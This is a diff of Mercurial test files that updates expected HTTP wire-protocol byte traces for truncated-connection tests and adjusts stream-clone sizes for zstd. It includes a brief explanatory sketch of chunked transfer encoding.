+ sendall(473 from 473) -> (206) 1d2\\r\\n\x00\x00\x00\xb2\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>6a3df4de388f3c4f8e28f4f9a814299a3cbb5f50\\ntest\\n0 0\\nfoo\\n\\ninitial\x00\x00\x00\x00\x00\x00\x00\xa1j=\xf4\xde8\x8f<O\x8e(\xf4\xf9\xa8\x14)\x9a<\xbb_P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-foo\x00b80de5d138758541c5f05265ad144ab9fa86d1db\\n\x00\x00\x00\x00\x00\x00\x00\x07foo\x00\x00\x00h\xb8\\r\xe5\xd18u\x85A\xc5\xf0Re\xad\x14J\xb9\xfa\x86\xd1\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\\r\\n (esc)
+ sendall(9 from 9) -> (197) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
+ sendall(9 from 9) -> (188) 4\\r\\n\x00\x00\x00 \\r\\n (esc)
+ sendall(38 from 38) -> (150) 20\\r\\n\x08LISTKEYS\x00\x00\x00\x01\x01\x00 \x06namespacephases\\r\\n (esc)
+ sendall(9 from 9) -> (141) 4\\r\\n\x00\x00\x00:\\r\\n (esc)
+ sendall(64 from 64) -> (77) 3a\r\n96ee1d7354c4ad7372047672c36a1f561e3a6a4c 1\npublishing True\r\n
+ sendall(9 from 9) -> (68) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
+ sendall(9 from 9) -> (59) 4\\r\\n\x00\x00\x00#\\r\\n (esc)
+ sendall(41 from 41) -> (18) 23\\r\\n\x08LISTKEYS\x00\x00\x00\x02\x01\x00 namespacebookmarks\\r\\n (esc)
sendall(9 from 9) -> (9) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
sendall(9 from 9) -> (0) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
write limit reached; closing socket
@@ -1193,25 +1188,20 @@
#else
- $ "$PYTHON" $TESTDIR/filtertraceback.py < error.log | tail -26
- write(9 from 9) -> (851) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
- write(9 from 9) -> (842) 4\\r\\n\x00\x00\x00)\\r\\n (esc)
- write(47 from 47) -> (795) 29\\r\\n\x0bCHANGEGROUP\x00\x00\x00\x00\x01\x01\x07\x02 \x01version02nbchanges1\\r\\n (esc)
- write(9 from 9) -> (786) 4\\r\\n\x00\x00\x01\xd2\\r\\n (esc)
- write(473 from 473) -> (313) 1d2\\r\\n\x00\x00\x00\xb2\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>6a3df4de388f3c4f8e28f4f9a814299a3cbb5f50\\ntest\\n0 0\\nfoo\\n\\ninitial\x00\x00\x00\x00\x00\x00\x00\xa1j=\xf4\xde8\x8f<O\x8e(\xf4\xf9\xa8\x14)\x9a<\xbb_P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-foo\x00b80de5d138758541c5f05265ad144ab9fa86d1db\\n\x00\x00\x00\x00\x00\x00\x00\x07foo\x00\x00\x00h\xb8\\r\xe5\xd18u\x85A\xc5\xf0Re\xad\x14J\xb9\xfa\x86\xd1\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\\r\\n (esc)
- write(9 from 9) -> (304) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
- write(9 from 9) -> (295) 4\\r\\n\x00\x00\x00 \\r\\n (esc)
- write(38 from 38) -> (257) 20\\r\\n\x08LISTKEYS\x00\x00\x00\x01\x01\x00 \x06namespacephases\\r\\n (esc)
- write(9 from 9) -> (248) 4\\r\\n\x00\x00\x00:\\r\\n (esc)
- write(64 from 64) -> (184) 3a\r\n96ee1d7354c4ad7372047672c36a1f561e3a6a4c 1\npublishing True\r\n
- write(9 from 9) -> (175) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
- write(9 from 9) -> (166) 4\\r\\n\x00\x00\x00#\\r\\n (esc)
- write(41 from 41) -> (125) 23\\r\\n\x08LISTKEYS\x00\x00\x00\x02\x01\x00 namespacebookmarks\\r\\n (esc)
- write(9 from 9) -> (116) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
- write(9 from 9) -> (107) 4\\r\\n\x00\x00\x00\x1d\\r\\n (esc)
- write(35 from 35) -> (72) 1d\\r\\n\x16cache:rev-branch-cache\x00\x00\x00\x03\x00\x00\\r\\n (esc)
- write(9 from 9) -> (63) 4\\r\\n\x00\x00\x00'\\r\\n (esc)
- write(45 from 45) -> (18) 27\\r\\n\x00\x00\x00\x07\x00\x00\x00\x01\x00\x00\x00\x00default\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\\r\\n (esc)
+ $ "$PYTHON" $TESTDIR/filtertraceback.py < error.log | tail -21
+ write(9 from 9) -> (744) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
+ write(9 from 9) -> (735) 4\\r\\n\x00\x00\x00)\\r\\n (esc)
+ write(47 from 47) -> (688) 29\\r\\n\x0bCHANGEGROUP\x00\x00\x00\x00\x01\x01\x07\x02 \x01version02nbchanges1\\r\\n (esc)
+ write(9 from 9) -> (679) 4\\r\\n\x00\x00\x01\xd2\\r\\n (esc)
+ write(473 from 473) -> (206) 1d2\\r\\n\x00\x00\x00\xb2\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>6a3df4de388f3c4f8e28f4f9a814299a3cbb5f50\\ntest\\n0 0\\nfoo\\n\\ninitial\x00\x00\x00\x00\x00\x00\x00\xa1j=\xf4\xde8\x8f<O\x8e(\xf4\xf9\xa8\x14)\x9a<\xbb_P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-foo\x00b80de5d138758541c5f05265ad144ab9fa86d1db\\n\x00\x00\x00\x00\x00\x00\x00\x07foo\x00\x00\x00h\xb8\\r\xe5\xd18u\x85A\xc5\xf0Re\xad\x14J\xb9\xfa\x86\xd1\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\\r\\n (esc)
+ write(9 from 9) -> (197) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
+ write(9 from 9) -> (188) 4\\r\\n\x00\x00\x00 \\r\\n (esc)
+ write(38 from 38) -> (150) 20\\r\\n\x08LISTKEYS\x00\x00\x00\x01\x01\x00 \x06namespacephases\\r\\n (esc)
+ write(9 from 9) -> (141) 4\\r\\n\x00\x00\x00:\\r\\n (esc)
+ write(64 from 64) -> (77) 3a\r\n96ee1d7354c4ad7372047672c36a1f561e3a6a4c 1\npublishing True\r\n
+ write(9 from 9) -> (68) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
+ write(9 from 9) -> (59) 4\\r\\n\x00\x00\x00#\\r\\n (esc)
+ write(41 from 41) -> (18) 23\\r\\n\x08LISTKEYS\x00\x00\x00\x02\x01\x00 namespacebookmarks\\r\\n (esc)
write(9 from 9) -> (9) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
write(9 from 9) -> (0) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
write limit reached; closing socket
@@ -1227,7 +1217,7 @@
Server sends the size-0 chunked-transfer size line without the terminating \r\n
- $ hg serve --config badserver.closeaftersendbytes=1865 -p $HGPORT -d --pid-file=hg.pid -E error.log
+ $ hg serve --config badserver.closeaftersendbytes=1739 -p $HGPORT -d --pid-file=hg.pid -E error.log
$ cat hg.pid > $DAEMON_PIDS
$ hg clone http://localhost:$HGPORT/ clone
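
Here the byte budget runs out three bytes into the five-byte chunked-transfer terminator, so the client receives "0\r\n" but never the final blank line (the sendall(3 from 5) entry below). A minimal sketch of the chunked framing for reference (illustrative only):

    def encode_chunked(chunks):
        """Yield the wire bytes of an HTTP/1.1 chunked-encoded body."""
        for chunk in chunks:
            yield b"%x\r\n" % len(chunk)  # hex chunk-size line
            yield chunk + b"\r\n"
        yield b"0\r\n\r\n"  # 5-byte terminator; this test truncates it to 3

    assert b"".join(encode_chunked([b"hi"])) == b"2\r\nhi\r\n0\r\n\r\n"
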
@@ -1243,25 +1233,20 @@
$ killdaemons.py $DAEMON_PIDS
#if py36
- $ "$PYTHON" $TESTDIR/filtertraceback.py < error.log | tail -26
- sendall(9 from 9) -> (854) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
- sendall(9 from 9) -> (845) 4\\r\\n\x00\x00\x00)\\r\\n (esc)
- sendall(47 from 47) -> (798) 29\\r\\n\x0bCHANGEGROUP\x00\x00\x00\x00\x01\x01\x07\x02 \x01version02nbchanges1\\r\\n (esc)
- sendall(9 from 9) -> (789) 4\\r\\n\x00\x00\x01\xd2\\r\\n (esc)
- sendall(473 from 473) -> (316) 1d2\\r\\n\x00\x00\x00\xb2\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>6a3df4de388f3c4f8e28f4f9a814299a3cbb5f50\\ntest\\n0 0\\nfoo\\n\\ninitial\x00\x00\x00\x00\x00\x00\x00\xa1j=\xf4\xde8\x8f<O\x8e(\xf4\xf9\xa8\x14)\x9a<\xbb_P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-foo\x00b80de5d138758541c5f05265ad144ab9fa86d1db\\n\x00\x00\x00\x00\x00\x00\x00\x07foo\x00\x00\x00h\xb8\\r\xe5\xd18u\x85A\xc5\xf0Re\xad\x14J\xb9\xfa\x86\xd1\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\\r\\n (esc)
- sendall(9 from 9) -> (307) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
- sendall(9 from 9) -> (298) 4\\r\\n\x00\x00\x00 \\r\\n (esc)
- sendall(38 from 38) -> (260) 20\\r\\n\x08LISTKEYS\x00\x00\x00\x01\x01\x00 \x06namespacephases\\r\\n (esc)
- sendall(9 from 9) -> (251) 4\\r\\n\x00\x00\x00:\\r\\n (esc)
- sendall(64 from 64) -> (187) 3a\r\n96ee1d7354c4ad7372047672c36a1f561e3a6a4c 1\npublishing True\r\n
- sendall(9 from 9) -> (178) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
- sendall(9 from 9) -> (169) 4\\r\\n\x00\x00\x00#\\r\\n (esc)
- sendall(41 from 41) -> (128) 23\\r\\n\x08LISTKEYS\x00\x00\x00\x02\x01\x00 namespacebookmarks\\r\\n (esc)
- sendall(9 from 9) -> (119) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
- sendall(9 from 9) -> (110) 4\\r\\n\x00\x00\x00\x1d\\r\\n (esc)
- sendall(35 from 35) -> (75) 1d\\r\\n\x16cache:rev-branch-cache\x00\x00\x00\x03\x00\x00\\r\\n (esc)
- sendall(9 from 9) -> (66) 4\\r\\n\x00\x00\x00'\\r\\n (esc)
- sendall(45 from 45) -> (21) 27\\r\\n\x00\x00\x00\x07\x00\x00\x00\x01\x00\x00\x00\x00default\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\\r\\n (esc)
+ $ "$PYTHON" $TESTDIR/filtertraceback.py < error.log | tail -21
+ sendall(9 from 9) -> (747) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
+ sendall(9 from 9) -> (738) 4\\r\\n\x00\x00\x00)\\r\\n (esc)
+ sendall(47 from 47) -> (691) 29\\r\\n\x0bCHANGEGROUP\x00\x00\x00\x00\x01\x01\x07\x02 \x01version02nbchanges1\\r\\n (esc)
+ sendall(9 from 9) -> (682) 4\\r\\n\x00\x00\x01\xd2\\r\\n (esc)
+ sendall(473 from 473) -> (209) 1d2\\r\\n\x00\x00\x00\xb2\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>6a3df4de388f3c4f8e28f4f9a814299a3cbb5f50\\ntest\\n0 0\\nfoo\\n\\ninitial\x00\x00\x00\x00\x00\x00\x00\xa1j=\xf4\xde8\x8f<O\x8e(\xf4\xf9\xa8\x14)\x9a<\xbb_P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-foo\x00b80de5d138758541c5f05265ad144ab9fa86d1db\\n\x00\x00\x00\x00\x00\x00\x00\x07foo\x00\x00\x00h\xb8\\r\xe5\xd18u\x85A\xc5\xf0Re\xad\x14J\xb9\xfa\x86\xd1\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\\r\\n (esc)
+ sendall(9 from 9) -> (200) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
+ sendall(9 from 9) -> (191) 4\\r\\n\x00\x00\x00 \\r\\n (esc)
+ sendall(38 from 38) -> (153) 20\\r\\n\x08LISTKEYS\x00\x00\x00\x01\x01\x00 \x06namespacephases\\r\\n (esc)
+ sendall(9 from 9) -> (144) 4\\r\\n\x00\x00\x00:\\r\\n (esc)
+ sendall(64 from 64) -> (80) 3a\r\n96ee1d7354c4ad7372047672c36a1f561e3a6a4c 1\npublishing True\r\n
+ sendall(9 from 9) -> (71) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
+ sendall(9 from 9) -> (62) 4\\r\\n\x00\x00\x00#\\r\\n (esc)
+ sendall(41 from 41) -> (21) 23\\r\\n\x08LISTKEYS\x00\x00\x00\x02\x01\x00 namespacebookmarks\\r\\n (esc)
sendall(9 from 9) -> (12) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
sendall(9 from 9) -> (3) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
sendall(3 from 5) -> (0) 0\r\n
@@ -1272,25 +1257,20 @@
#else
- $ "$PYTHON" $TESTDIR/filtertraceback.py < error.log | tail -27
- write(9 from 9) -> (854) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
- write(9 from 9) -> (845) 4\\r\\n\x00\x00\x00)\\r\\n (esc)
- write(47 from 47) -> (798) 29\\r\\n\x0bCHANGEGROUP\x00\x00\x00\x00\x01\x01\x07\x02 \x01version02nbchanges1\\r\\n (esc)
- write(9 from 9) -> (789) 4\\r\\n\x00\x00\x01\xd2\\r\\n (esc)
- write(473 from 473) -> (316) 1d2\\r\\n\x00\x00\x00\xb2\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>6a3df4de388f3c4f8e28f4f9a814299a3cbb5f50\\ntest\\n0 0\\nfoo\\n\\ninitial\x00\x00\x00\x00\x00\x00\x00\xa1j=\xf4\xde8\x8f<O\x8e(\xf4\xf9\xa8\x14)\x9a<\xbb_P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-foo\x00b80de5d138758541c5f05265ad144ab9fa86d1db\\n\x00\x00\x00\x00\x00\x00\x00\x07foo\x00\x00\x00h\xb8\\r\xe5\xd18u\x85A\xc5\xf0Re\xad\x14J\xb9\xfa\x86\xd1\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\\r\\n (esc)
- write(9 from 9) -> (307) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
- write(9 from 9) -> (298) 4\\r\\n\x00\x00\x00 \\r\\n (esc)
- write(38 from 38) -> (260) 20\\r\\n\x08LISTKEYS\x00\x00\x00\x01\x01\x00 \x06namespacephases\\r\\n (esc)
- write(9 from 9) -> (251) 4\\r\\n\x00\x00\x00:\\r\\n (esc)
- write(64 from 64) -> (187) 3a\r\n96ee1d7354c4ad7372047672c36a1f561e3a6a4c 1\npublishing True\r\n
- write(9 from 9) -> (178) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
- write(9 from 9) -> (169) 4\\r\\n\x00\x00\x00#\\r\\n (esc)
- write(41 from 41) -> (128) 23\\r\\n\x08LISTKEYS\x00\x00\x00\x02\x01\x00 namespacebookmarks\\r\\n (esc)
- write(9 from 9) -> (119) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
- write(9 from 9) -> (110) 4\\r\\n\x00\x00\x00\x1d\\r\\n (esc)
- write(35 from 35) -> (75) 1d\\r\\n\x16cache:rev-branch-cache\x00\x00\x00\x03\x00\x00\\r\\n (esc)
- write(9 from 9) -> (66) 4\\r\\n\x00\x00\x00'\\r\\n (esc)
- write(45 from 45) -> (21) 27\\r\\n\x00\x00\x00\x07\x00\x00\x00\x01\x00\x00\x00\x00default\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\\r\\n (esc)
+ $ "$PYTHON" $TESTDIR/filtertraceback.py < error.log | tail -22
+ write(9 from 9) -> (747) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
+ write(9 from 9) -> (738) 4\\r\\n\x00\x00\x00)\\r\\n (esc)
+ write(47 from 47) -> (691) 29\\r\\n\x0bCHANGEGROUP\x00\x00\x00\x00\x01\x01\x07\x02 \x01version02nbchanges1\\r\\n (esc)
+ write(9 from 9) -> (682) 4\\r\\n\x00\x00\x01\xd2\\r\\n (esc)
+ write(473 from 473) -> (209) 1d2\\r\\n\x00\x00\x00\xb2\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>6a3df4de388f3c4f8e28f4f9a814299a3cbb5f50\\ntest\\n0 0\\nfoo\\n\\ninitial\x00\x00\x00\x00\x00\x00\x00\xa1j=\xf4\xde8\x8f<O\x8e(\xf4\xf9\xa8\x14)\x9a<\xbb_P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-foo\x00b80de5d138758541c5f05265ad144ab9fa86d1db\\n\x00\x00\x00\x00\x00\x00\x00\x07foo\x00\x00\x00h\xb8\\r\xe5\xd18u\x85A\xc5\xf0Re\xad\x14J\xb9\xfa\x86\xd1\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\\r\\n (esc)
+ write(9 from 9) -> (200) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
+ write(9 from 9) -> (191) 4\\r\\n\x00\x00\x00 \\r\\n (esc)
+ write(38 from 38) -> (153) 20\\r\\n\x08LISTKEYS\x00\x00\x00\x01\x01\x00 \x06namespacephases\\r\\n (esc)
+ write(9 from 9) -> (144) 4\\r\\n\x00\x00\x00:\\r\\n (esc)
+ write(64 from 64) -> (80) 3a\r\n96ee1d7354c4ad7372047672c36a1f561e3a6a4c 1\npublishing True\r\n
+ write(9 from 9) -> (71) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
+ write(9 from 9) -> (62) 4\\r\\n\x00\x00\x00#\\r\\n (esc)
+ write(41 from 41) -> (21) 23\\r\\n\x08LISTKEYS\x00\x00\x00\x02\x01\x00 namespacebookmarks\\r\\n (esc)
write(9 from 9) -> (12) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
write(9 from 9) -> (3) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
write(3 from 5) -> (0) 0\r\n
--- a/tests/test-http-bundle1.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-http-bundle1.t Tue Apr 20 11:01:06 2021 -0400
@@ -38,7 +38,8 @@
#if no-reposimplestore
$ hg clone --stream http://localhost:$HGPORT/ copy 2>&1
streaming all changes
- 6 files to transfer, 606 bytes of data
+ 6 files to transfer, 606 bytes of data (no-zstd !)
+ 6 files to transfer, 608 bytes of data (zstd !)
transferred * bytes in * seconds (*/sec) (glob)
searching for changes
no changes found
@@ -225,7 +226,8 @@
#if no-reposimplestore
$ hg clone http://user:pass@localhost:$HGPORT2/ dest 2>&1
streaming all changes
- 7 files to transfer, 916 bytes of data
+ 7 files to transfer, 916 bytes of data (no-zstd !)
+ 7 files to transfer, 919 bytes of data (zstd !)
transferred * bytes in * seconds (*/sec) (glob)
searching for changes
no changes found
--- a/tests/test-http-protocol.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-http-protocol.t Tue Apr 20 11:01:06 2021 -0400
@@ -1,8 +1,13 @@
#require no-chg
+persistent-nodemap is not enabled by default. It is not relevant for this test
+so disable it.
+
$ . $TESTDIR/wireprotohelpers.sh
$ cat >> $HGRCPATH << EOF
+ > [format]
+ > use-persistent-nodemap = no
> [web]
> push_ssl = false
> allow_push = *
@@ -321,7 +326,7 @@
s> Content-Type: application/mercurial-cbor\r\n
s> Content-Length: *\r\n (glob)
s> \r\n
